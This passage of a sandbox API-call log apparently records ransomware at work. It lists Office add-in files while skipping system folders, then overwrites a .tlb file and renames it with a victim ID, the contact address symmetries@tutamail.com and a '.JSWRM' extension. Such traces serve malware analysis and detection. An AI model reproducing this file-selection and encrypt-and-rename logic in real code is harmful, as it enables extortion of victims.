| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpUsedDefaultChar=0x0) returned 56 [0126.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e688 [0126.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2=".") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="..") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="...") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="windows") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="recovery") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="perflogs") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="documents and settings") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="system volume information") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Common.dll", lpString2="msocache") returned -1 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0126.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Common.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Common.dll", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Common.dll", lpUsedDefaultChar=0x0) returned 40 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Common.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Common.dll", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Common.dll", lpUsedDefaultChar=0x0) returned 40 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2475b0 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2=".") returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="..") returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="...") returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="windows") returned -1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="recovery") returned -1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="perflogs") returned -1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="documents and settings") returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="$RECYCLE.BIN") returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="system volume information") returned -1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.DLL", lpString2="msocache") returned -1 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.DLL", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.DLL", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.DLL", lpUsedDefaultChar=0x0) returned 27 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.DLL", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.DLL", cchWideChar=27, lpMultiByteStr=0x240f48, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.DLL", lpUsedDefaultChar=0x0) returned 27 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.697] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2=".") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="..") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="...") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="windows") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="recovery") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="perflogs") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="documents and settings") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="$RECYCLE.BIN") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="system volume information") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.DLL", lpString2="msocache") returned -1 [0126.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0126.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.DLL", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0126.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.DLL", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.DLL", lpUsedDefaultChar=0x0) returned 38 [0126.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0126.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0126.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.DLL", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0126.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.DLL", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.DLL", lpUsedDefaultChar=0x0) returned 38 [0126.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0126.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247e68 [0126.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0126.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2=".") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="..") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="...") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="windows") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="recovery") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="perflogs") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="documents and settings") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="system volume information") returned -1 [0126.698] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="msocache") returned -1 [0126.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0126.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Excel.dll", lpUsedDefaultChar=0x0) returned 34 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Excel.dll", lpUsedDefaultChar=0x0) returned 34 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247f60 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2=".") returned 1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="..") returned 1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="...") returned 1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="windows") returned -1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="recovery") returned -1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="perflogs") returned -1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="documents and settings") returned 1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="system volume information") returned -1 [0126.699] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpString2="msocache") returned -1 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.dll", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpUsedDefaultChar=0x0) returned 42 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.dll", cchWideChar=42, lpMultiByteStr=0x22d298, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.dll", lpUsedDefaultChar=0x0) returned 42 [0126.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0126.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0126.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2=".") returned 1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="..") returned 1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="...") returned 1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="windows") returned -1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="recovery") returned -1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="perflogs") returned -1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="documents and settings") returned 1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="$RECYCLE.BIN") returned 1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="system volume information") returned -1 [0126.700] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpString2="msocache") returned -1 [0126.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0126.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", cchWideChar=42, lpMultiByteStr=0x22ce70, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpUsedDefaultChar=0x0) returned 42 [0126.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0126.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0126.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.tlb", lpUsedDefaultChar=0x0) returned 42 [0126.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0126.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.Office.PowerPivot.ExcelAddIn.tlb" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.office.powerpivot.exceladdin.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.701] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4052) returned 1 [0126.701] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfd0) returned 0x206858 [0126.701] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xfd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e534*=0xfd0, lpOverlapped=0x0) returned 1 [0126.707] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.707] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e530*=0xfd0, lpOverlapped=0x0) returned 1 [0126.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0126.707] CloseHandle (hObject=0x314) returned 1 [0126.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x21bc08 [0126.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0126.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0126.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x218b68 [0126.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17e) returned 0x202020 [0126.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0126.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.708] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.Office.PowerPivot.ExcelAddIn.tlb" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.office.powerpivot.exceladdin.tlb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.Office.PowerPivot.ExcelAddIn.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.office.powerpivot.exceladdin.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x202020 | out: hHeap=0x1e0000) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21bc08 | out: hHeap=0x1e0000) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 